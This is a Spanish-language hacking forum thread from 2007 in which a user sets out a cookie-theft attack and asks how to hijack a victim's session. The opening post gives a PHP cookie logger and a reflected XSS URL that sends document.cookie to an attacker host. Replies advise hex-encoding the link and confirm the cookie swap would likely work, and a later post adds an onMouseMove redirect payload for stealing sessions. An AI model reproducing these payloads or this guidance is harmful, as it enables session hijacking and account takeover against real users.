elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  XSS ---falsificando sesiones
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: XSS ---falsificando sesiones  (Leído 4,388 veces)
keype

Desconectado Desconectado

Mensajes: 53


Ver Perfil
XSS ---falsificando sesiones
« en: 7 Mayo 2007, 19:09 pm »

Robo de cookie de sesion del sitio vulnerable.com, sitio en el que yo ya soy usuario registrado y también lo es la victima...

-Primero encontramos una caja de Buscaqueda vulnerable.
-A continuacion vamos a crear una pagina en php, este archivo creará otro (archivo.txt)  que nos mandará la cookie victima, el archivo a crear es robo.php, con este codigo:

<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

-Luego crear la url que al ser clikeada mandará la cookie victima a nuestro archivo.txt

http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/robo.php?cookie='+document.cookie;</script>&buscar=;

le mandamos el link a su email, está lo recibira y al dar click nos apoderaremos de su cookie.
-Luego falsificar el valor de nuestra cookie por el valor que le robamos a la victima, y listo.

------------Aqui es donde tengo este monton de preguntas:
------------
1-Para que funcione el ataque: ¿la victima tien que estar logueada primero en vulnerable.com luego se va a revistar su email y ejecuta el link maligno, ó el ataque funcionaría de todos modos si la victima solo llega a conectarse y lo primero y único que hace es abrir su email y hacer click en el link maligno, sin estar logueada en su cuenta de vulnerable.com??

2-En el código del archivo robo.php (que guardara el valor de la cookie robada en un fichero) se debe utilizar la función $_GET['cookie'], pero otros usan la función $_REQUEST, no hay problema? es lo mismo, verdad?

3-Siguiendo en el código de robo.php  ¿de que manera mi server que soporta php debe tener configurado su php.ini, hay problema si su php.ini tiene configuradas las variables
globales asi: register_globals OFF? o en el codigo de robo.php no importa si las variables globales están en ON ó en OFF?

4-haciendo uso de un script que se coloca en la barra de direcciones del navegador puedo ver el contenido de mi cookie
"javascript:void(document.cookie=prompt("Modifica el valor de la cookie",document.cookie).split(";"));"

que es una cadena de caracteres sin sentido! Me imagino que en el archivo.txt donde se escribirá la cookie robada, será ésta cadena de caracteres parecida a la mia, no?, es asi?

4.1 En caso de que sean las cadenas similares, para evitar un ataque Man In The Middle,  ¿puedo copiar esa cadena (cookie) victima, luego escribir el script en mi barra de direcciones  para ver mi cookie actual de mi cuenta en vulnerable.com y luego borrar la cadena que constituye mi cookie  y pegar la cadena de caracteres que constituye la cookie de la victima, y al dar click a Aceptar,  estaré logueado como la victima?

4.2 Si es que funciona este reemplazo de cadenas, la mia actual por la que me llego al archivo cookies.txt (que es la cadena que constituye la cookie de la victima), primero debo estar  logueado en vulnerable.com como yo (atacante) y en la misma ventana hacer el cambio de cadenas cookies, y luego aceptar y listo? ya estaría hecha la falsificacion de sesion..?

5 En caso de lo que arriba no funcione como puedo hacer un ataque Man in the Middle que programa de facil uso puedo usar? Este ataque MITM con el objeto de interceptar y editar las cabeceras HTTP para el cambio de cookies.. (eso de cabeceras y mitm, no me queda claro)

6-Durante todo este proceso en que capturo la cookie victima, hasta el final del MITM, ¿la victima debe estar online logueada en su sesion de vulnerable.com?, pero si está logueada mientras yo me robo y uso su cookie, ¿vulnerable.com permitiría que el mismo usuario este logueado dos veces en el mismo momento? ¿O en que parte del proceso del ataque la victima debería desconectarse?, sí es que tiene que hacerlo.....  porque las cookies tienen
un tiempo en que expiran no? es decir si me robo la cookie de algun usuario, bueno pues,  esta no me va a servir de por vida, es decir que me servirá una hora? dos horas? un día?,
por lo que la victima tiene que activarme su cookie durante un tiempito para que cuando me la robe, y la use, no haya expirado, no??

Saludos y de antemano gracias por las respuestas...
En línea

T.R.U.A

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: XSS ---falsificando sesiones
« Respuesta #1 en: 7 Mayo 2007, 19:50 pm »

Tienes muchas preguntas, parece examen  :xD
En línea

:)
Hans el Topo


Desconectado Desconectado

Mensajes: 1.754


"Estoy cansado de no hacer nada"


Ver Perfil WWW
Re: XSS ---falsificando sesiones
« Respuesta #2 en: 7 Mayo 2007, 19:55 pm »

Antes de nada deberías cifrar en hexadecimal la url que pretendes usar para el lameo

------------Aqui es donde tengo este monton de preguntas:
------------
1-Para que funcione el ataque: ¿la victima tien que estar logueada primero en vulnerable.com luego se va a revistar su email y ejecuta el link maligno, ó el ataque funcionaría de todos modos si la victima solo llega a conectarse y lo primero y único que hace es abrir su email y hacer click en el link maligno, sin estar logueada en su cuenta de vulnerable.com??
si las cookies no han expirado son robables

Citar
2-En el código del archivo robo.php (que guardara el valor de la cookie robada en un fichero) se debe utilizar la función $_GET['cookie'], pero otros usan la función $_REQUEST, no hay problema? es lo mismo, verdad?

yo siempre utilicé get

Citar
3-Siguiendo en el código de robo.php  ¿de que manera mi server que soporta php debe tener configurado su php.ini, hay problema si su php.ini tiene configuradas las variables
globales asi: register_globals OFF? o en el codigo de robo.php no importa si las variables globales están en ON ó en OFF?

no importa

Citar
4-haciendo uso de un script que se coloca en la barra de direcciones del navegador puedo ver el contenido de mi cookie
"javascript:void(document.cookie=prompt("Modifica el valor de la cookie",document.cookie).split(";"));"

que es una cadena de caracteres sin sentido! Me imagino que en el archivo.txt donde se escribirá la cookie robada, será ésta cadena de caracteres parecida a la mia, no?, es asi?

seguramente son los datos cifrados en md5 u otro algoritmo de cifrado

Citar
4.1 En caso de que sean las cadenas similares, para evitar un ataque Man In The Middle,  ¿puedo copiar esa cadena (cookie) victima, luego escribir el script en mi barra de direcciones  para ver mi cookie actual de mi cuenta en vulnerable.com y luego borrar la cadena que constituye mi cookie  y pegar la cadena de caracteres que constituye la cookie de la victima, y al dar click a Aceptar,  estaré logueado como la victima?
4.2 Si es que funciona este reemplazo de cadenas, la mia actual por la que me llego al archivo cookies.txt (que es la cadena que constituye la cookie de la victima), primero debo estar  logueado en vulnerable.com como yo (atacante) y en la misma ventana hacer el cambio de cadenas cookies, y luego aceptar y listo? ya estaría hecha la falsificacion de sesion..?

depende de las comprobaciones que haga el servidor, pero seguramente te funcione, necesitas tener creadas las cookies del sitio y asignarle los valores que has obtenido, o bien desencriptarlos y conectarte con ellos xD

Citar
5 En caso de lo que arriba no funcione como puedo hacer un ataque Man in the Middle que programa de facil uso puedo usar? Este ataque MITM con el objeto de interceptar y editar las cabeceras HTTP para el cambio de cookies.. (eso de cabeceras y mitm, no me queda claro)

desde el firefox herramientas/opciones/privacidad/mostrar cookies


Citar
6-Durante todo este proceso en que capturo la cookie victima, hasta el final del MITM, ¿la victima debe estar online logueada en su sesion de vulnerable.com?, pero si está logueada mientras yo me robo y uso su cookie, ¿vulnerable.com permitiría que el mismo usuario este logueado dos veces en el mismo momento? ¿O en que parte del proceso del ataque la victima debería desconectarse?, sí es que tiene que hacerlo.....  porque las cookies tienen
un tiempo en que expiran no? es decir si me robo la cookie de algun usuario, bueno pues,  esta no me va a servir de por vida, es decir que me servirá una hora? dos horas? un día?,
por lo que la victima tiene que activarme su cookie durante un tiempito para que cuando me la robe, y la use, no haya expirado, no??

depende del servidor, pero seguramente no haga falta que la victima se deslogee


P.D te respondo por haberme acosado por msn xD
« Última modificación: 7 Mayo 2007, 19:58 pm por Hans el Topo » En línea

T.R.U.A

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: XSS ---falsificando sesiones
« Respuesta #3 en: 7 Mayo 2007, 19:59 pm »

seguramente son los datos cifrados en md5 u otro algoritmo de cifrado

Base64  ::)
En línea

:)
keype

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS ---falsificando sesiones
« Respuesta #4 en: 7 Mayo 2007, 22:34 pm »

Citar
desde el firefox herramientas/opciones/privacidad/mostrar cookies

Esto es man in the middle?????

Ademas eso en realidad no MODIFICA las cookies sino que lo que hace es permitir BORRARLAS.

Debo usar un editor de cookies, que programa me recomiendas?, pero si ya entendiste mi problema?, el meollo del asunto es que en un archivo.txt voy a recibir la cadena cifrada de la cookie-victima, luego yo logueado con mi cookie NECESITO borrar mi cadena de caracteres cifrada por la cadena de caracteres cifrada de la VICTIMA, para hacerme pasar por ella, claro todo antes de que expire el tiempo de sesion de cookie-victima...
« Última modificación: 7 Mayo 2007, 22:54 pm por keype » En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: XSS ---falsificando sesiones
« Respuesta #5 en: 9 Mayo 2007, 00:51 am »

Te recomiendo IECookiesView o Proxomitron, buscalos en google.



Aprovecho este hilo activo, dirigido a las mentes más despiertas, para resolver una duda.

Mi intención no es exactamente falsificar la sesión, si no rovarla a traves de $HTTP_REFERER, y la cosa funciona, solo que el usuario tiene que pasar el puntero del ratón por encima del hipervínculo para que se ejecute el código javascript. Lo que quisiera es que el código javascript se ejecutase nada más cargar la página, tipo onLoad.

Para mi se ha convertido en un reto, aunque ya lo doy por perdido, a ver como lo ven ustedes...

Caracteres prohividos: < &

<a href="url"><img src="img" border="0" alt="alt"></a>

<a href="url" onMouseMove="javascript:location.href=http://stealsession"><img src="img" border="0" alt="alt"></a>
En línea

keype

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: XSS ---falsificando sesiones
« Respuesta #6 en: 12 Mayo 2007, 20:16 pm »

Quizas lo que necesites es interceptar las cabeceras http, desde ahi puedes manipular el Referer, sin problemas....
En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: XSS ---falsificando sesiones
« Respuesta #7 en: 13 Mayo 2007, 03:22 am »

Quizas lo que necesites es interceptar las cabeceras http, desde ahi puedes manipular el Referer, sin problemas....

Quizás entendiste mal, no pretendo manipular mi referencia, si no capturarla, redireccionando como sea a la víctima, desde la página vulnerable a mi servidor.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Dudas de sesiones
PHP
GameAndWatch 4 1,849 Último mensaje 21 Septiembre 2012, 18:49 pm
por GameAndWatch
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines